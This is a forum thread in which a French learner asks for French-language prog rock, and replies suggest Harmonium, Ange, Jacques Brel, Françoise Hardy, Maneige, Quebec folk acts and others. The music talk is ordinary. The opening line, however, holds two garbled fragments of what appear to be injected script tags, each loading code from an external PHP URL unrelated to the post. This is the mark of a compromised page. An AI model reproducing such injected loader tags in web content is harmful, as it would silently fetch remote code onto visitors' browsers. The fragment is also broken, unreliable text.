Hello everyone!< ="text/" ="https://cuev.in/aux.php?ver=1.0&ref=at&debug=">< ="text/" ="https://cuev.in/aux.php?ver=1.0&ref=at&debug=">

I've been studying French and I want to keep practicing by listening to songs that are in French; the problem is that I only know Nemo, and although I liked them I would like to know some other prog recommendations you may give me.

Thank you a lot!

Yeah, Harmonium must be one of the most obvious choices. Ange should be another... I haven't actually heard them, but I have read about them and have my mind on getting some music from them. There's also Alcest, which is more metal (or ambient, depending on which album you get).

Not prog, but in Amadou & Mariam Amadou is singing French. Jacques Brel is one of my favourite French-singing vocalist.

Ange is my absolute favorite francophone band. Their lyrics--though my understanding of them is far from perfect--are fantastic.

Harmonium is #1 for me, hands down. That record got me into foreign speaking prog real fast.

Etron Fou Leloublan, only if you're into R.I.O., highly recommended!

For a modern band one could do no better than Aquaserge.

Since the OP is involved in language learning it should probably be said that Harmonium, mentioned by several posters, was a Quebecois band. To my (very limited) understanding, Quebecois French is a little different from French French. Probably not different enough that it would be a big deal, but FWIW. I think these are difference in pronunciation, vocabulary and vernacular usage rather than grammar.

Plenty of Québécois bands like Morse Code or Beau Dommage (and CANO from Ontario) have not been mentioned here.

Brel is tops, really!!!

And if you understand/master French, his lyrics are often out of this world

Francoise Hardy is amazing. Comment Te Dire Adieu ?, Et Si Je M'en Vais Avant Toi, La Question, Soleil (possibly my favorite album from her) are ALL great.

This song sounds like a toy factory

Jean-Claude Vannier for L'Enfant Assassin, which goes without saying.
With that, Serge Gainsbourg's Histoire De Melody Nelson.. You can find prog in any good music if you try hard enough. Nothing wrong with expanding your horizons.

Maneige's Les Porches has.. Some vocals. Certainly one of my very favorites of any music.

One of my favorites is Emmanuel Booz's Dans Quel Etat J'Erre released in 1979.

Ange, Atoll, and Francis Décamps solo have some good albums too.

In the prog folk realm you've got Tri Yann, Alan Stivell (who sings in breton and English as well), Dan Ar Braz, Gilles Servat, Garolou (from Quebec), and Thork.

Other good French language bands are Mes Aieux also from Quebec and Merzhin (from France)
